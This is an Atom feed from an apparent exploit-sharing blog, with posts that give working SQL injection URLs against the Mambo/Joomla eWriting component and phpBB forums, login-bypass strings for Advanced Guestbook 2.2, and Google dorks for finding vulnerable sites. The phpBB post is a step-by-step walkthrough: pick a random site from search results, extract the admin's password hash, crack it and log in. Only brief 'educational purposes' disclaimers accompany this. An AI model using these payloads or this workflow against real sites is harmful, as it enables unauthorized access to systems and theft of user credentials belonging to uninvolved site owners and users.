<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8534993114294306331</id><updated>2011-04-21T13:39:44.313-07:00</updated><title type='text'>latest exploits and vulnerabilities</title><subtitle type='html'>On Xpl0r3d You Can Discuss About: zero day exploits
Security, Exploits And Vulnerabilities
Share Your Latest, 0day Exploits, vulnerabilities here.
The Information Provided On This Blog Is For Educational Purpose Only.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://xpl0r3d.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8534993114294306331/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://xpl0r3d.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Ca$h</name><uri>http://www.blogger.com/profile/17138069467812416226</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>4</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8534993114294306331.post-218405026660161806</id><published>2008-03-16T06:24:00.000-07:00</published><updated>2008-03-16T06:26:36.996-07:00</updated><title type='text'>Mambo Component eWriting 1.2.1 (cat) SQL Injection</title><content type='html'>eWriting 1.2.1 - SQL injection&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dorks:&lt;br /&gt;&lt;br /&gt;"Powered by eWriting 1.2.1&lt;br /&gt;allinurl:"com_ewriting"&lt;br /&gt;&lt;br /&gt;Joomla!&lt;br /&gt;/index.php?option=com_ewriting&amp;amp;Itemid=9999&amp;amp;func=sel ectcat&amp;amp;cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--&lt;br /&gt;&lt;br /&gt;Mambo&lt;br /&gt;/index.php?option=com_ewriting&amp;amp;Itemid=9999&amp;amp;func=sel ectcat&amp;amp;cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--&lt;br /&gt;&lt;br /&gt;All credit goes to the original author&lt;br /&gt;&lt;br /&gt;Source: http://hacking.isgreat.org/community/showthread.php?t=1015&lt;br /&gt;&lt;br /&gt;Note: This is for educational purposes only, don't cause harm to anyone using this exploit&lt;br /&gt;&lt;br /&gt;Enjoy!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8534993114294306331-218405026660161806?l=xpl0r3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xpl0r3d.blogspot.com/feeds/218405026660161806/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8534993114294306331&amp;postID=218405026660161806' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8534993114294306331/posts/default/218405026660161806'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8534993114294306331/posts/default/218405026660161806'/><link rel='alternate' type='text/html' href='http://xpl0r3d.blogspot.com/2008/03/mambo-component-ewriting-121-cat-sql.html' title='Mambo Component eWriting 1.2.1 (cat) SQL Injection'/><author><name>Ca$h</name><uri>http://www.blogger.com/profile/17138069467812416226</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8534993114294306331.post-907081069283101643</id><published>2008-03-15T12:32:00.000-07:00</published><updated>2008-03-15T12:37:12.471-07:00</updated><title type='text'>Phpbb hacking with pictures</title><content type='html'>Phpbb hacking with pictures&lt;br /&gt;I already posted a step by step video for this hack&lt;br /&gt;the video is located @ &lt;a href="http://rapidshare.com/files/99460220/phpbb-Sql-Injection.rar.html" target="_blank"&gt;[quote]http://rapidshare.com/files/99460220/phpbb-Sql-Injection.rar.html[/quote]&lt;/a&gt;&lt;br /&gt;Well get back to work &lt;img src="http://hacking.isgreat.org/community/images/smilies/smile.gif" alt="" title="Smile" smilieid="1" class="inlineimg" border="0" /&gt;&lt;br /&gt;What we need for this hack to work:&lt;br /&gt;1: A pc with internet connection&lt;br /&gt;2: our friend (Google)&lt;br /&gt;3: The sql injection code&lt;br /&gt;4. And finally the target.&lt;br /&gt;&lt;br /&gt;lets do it step by step:&lt;br /&gt;&lt;br /&gt;open up google and type "Modified by Fully Modded"  in search bar.&lt;br /&gt;it will give many results, select any one randomly.&lt;br /&gt;&lt;br /&gt;this is what you most likely be getting after you search for the above string.&lt;br /&gt;&lt;img src="http://img372.imageshack.us/img372/2172/51620933go2.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Just have a look at the target&lt;br /&gt;&lt;br /&gt;now we have the target, its time to inject our target now:&lt;br /&gt;for injection we use the following string :&lt;br /&gt;&lt;br /&gt;[code]http://site.com/forum/kb.php?mode=article&amp;amp;k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&amp;amp;page_num=2&amp;amp;cat=1[/code]Now from the above string [replace the site.com/forum/] with you target site and forum path &lt;img src="http://hacking.isgreat.org/community/images/smilies/smile.gif" alt="" title="Smile" smilieid="1" class="inlineimg" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Hit enter and wait for the page to load fully&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img219.imageshack.us/img219/9457/38138541go3.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Well this sql injection will give you the admins username along with the hash&lt;br /&gt;now you need to break the hash in order to login as admin &lt;img src="http://hacking.isgreat.org/community/images/smilies/smile.gif" alt="" title="Smile" smilieid="1" class="inlineimg" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;To break the hash use&lt;br /&gt;&lt;a href="http://www.milw0rm.com/cracker/insert.php" target="_blank"&gt;http://www.milw0rm.com/cracker/insert.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;enter the hash their and click on submit and it will give you the password &lt;img src="http://hacking.isgreat.org/community/images/smilies/smile.gif" alt="" title="Smile" smilieid="1" class="inlineimg" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;All credit goes to the original author&lt;br /&gt;&lt;br /&gt;Source: http://hacking.isgreat.org/community/showthread.php?t=1015&lt;br /&gt;&lt;br /&gt;Note: This is for educational purposes only, don't cause harm to anyone using this exploit&lt;br /&gt;&lt;br /&gt;Enjoy!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8534993114294306331-907081069283101643?l=xpl0r3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xpl0r3d.blogspot.com/feeds/907081069283101643/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8534993114294306331&amp;postID=907081069283101643' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8534993114294306331/posts/default/907081069283101643'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8534993114294306331/posts/default/907081069283101643'/><link rel='alternate' type='text/html' href='http://xpl0r3d.blogspot.com/2008/03/phpbb-hacking-with-pictures.html' title='Phpbb hacking with pictures'/><author><name>Ca$h</name><uri>http://www.blogger.com/profile/17138069467812416226</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8534993114294306331.post-2071765155011278101</id><published>2008-02-08T03:56:00.000-08:00</published><updated>2008-02-08T04:15:48.124-08:00</updated><title type='text'>advanced guestbook vulnerability</title><content type='html'>its not a new vulnerability in "advanced guestbook"&lt;br /&gt;but i am posting it here because still no patch is issued for fixing it.&lt;br /&gt;&lt;br /&gt;as per bugtraq,&lt;br /&gt;It has been reported that Advanced Guestbook is prone to a SQL injection vulnerability that could allow an attacker to gain administrative access to the application.&lt;br /&gt;&lt;br /&gt;This issue is reported to exist in Advanced Guestbook 2.2, however, it is possible that other versions are affected as well.&lt;br /&gt;&lt;br /&gt;The following proof of concept exploits have been provided:&lt;br /&gt;&lt;br /&gt;JQ &lt;idiosyncrasie@xs4all.nl&gt; explains that it is possible to trigger this issue by leaving the username entry blank and entering the following string in the password field:&lt;br /&gt;&lt;br /&gt;') OR ('a' = 'a&lt;br /&gt;&lt;br /&gt;Spy Hat &lt;spyhat@spyhat.com&gt; comments that it is also possible to leverage this issue by leaving the password field blank and entering the following string into the username field:&lt;br /&gt;&lt;br /&gt;? or 1=1 --&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;For laymen:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;in simple terms,&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access.&lt;br /&gt;proof of concept can be found by googling for "intitle:guestbook "advanced guestbook 2.2 powered""&lt;br /&gt;&lt;br /&gt;this google query shows results for websites with "Advanced Guestbook v2.2" installed an attacker can select any of the results, and use this sql injection to gain unauthorized access.&lt;br /&gt;&lt;br /&gt;it is strongly recommended to change the name/location of www.example.com/guestbook/admin.php"&lt;br /&gt;also,   This vulnerability is reportedly fixed in version 2.3.1.&lt;br /&gt;update your version immediately if you are still running the old version.&lt;br /&gt;&lt;br /&gt;&lt;/spyhat@spyhat.com&gt;&lt;/idiosyncrasie@xs4all.nl&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8534993114294306331-2071765155011278101?l=xpl0r3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xpl0r3d.blogspot.com/feeds/2071765155011278101/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8534993114294306331&amp;postID=2071765155011278101' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8534993114294306331/posts/default/2071765155011278101'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8534993114294306331/posts/default/2071765155011278101'/><link rel='alternate' type='text/html' href='http://xpl0r3d.blogspot.com/2008/02/advanced-guestbook-vulnerability.html' title='advanced guestbook vulnerability'/><author><name>Ca$h</name><uri>http://www.blogger.com/profile/17138069467812416226</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8534993114294306331.post-7793892523557634159</id><published>2008-02-08T03:27:00.000-08:00</published><updated>2008-02-08T03:42:56.441-08:00</updated><title type='text'>My First Post</title><content type='html'>&lt;span style="font-size:78%;"&gt;Hi,&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This is my first post on "Latest Exploits and Vulnerabilities"&lt;br /&gt;I named this blog while  keeping in mind the meaning of the words used.&lt;br /&gt;I will try to update this blog with the latest exploits and vulnerabilities.&lt;br /&gt;&lt;br /&gt;If you like the content of this blog, you can also visit my website located at:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hacking.isgreat.org/"&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 102, 102);"&gt;http://hacking.isgreat.org&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Thank you for visiting this blog.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8534993114294306331-7793892523557634159?l=xpl0r3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xpl0r3d.blogspot.com/feeds/7793892523557634159/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8534993114294306331&amp;postID=7793892523557634159' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8534993114294306331/posts/default/7793892523557634159'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8534993114294306331/posts/default/7793892523557634159'/><link rel='alternate' type='text/html' href='http://xpl0r3d.blogspot.com/2008/02/my-first-post.html' title='My First Post'/><author><name>Ca$h</name><uri>http://www.blogger.com/profile/17138069467812416226</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
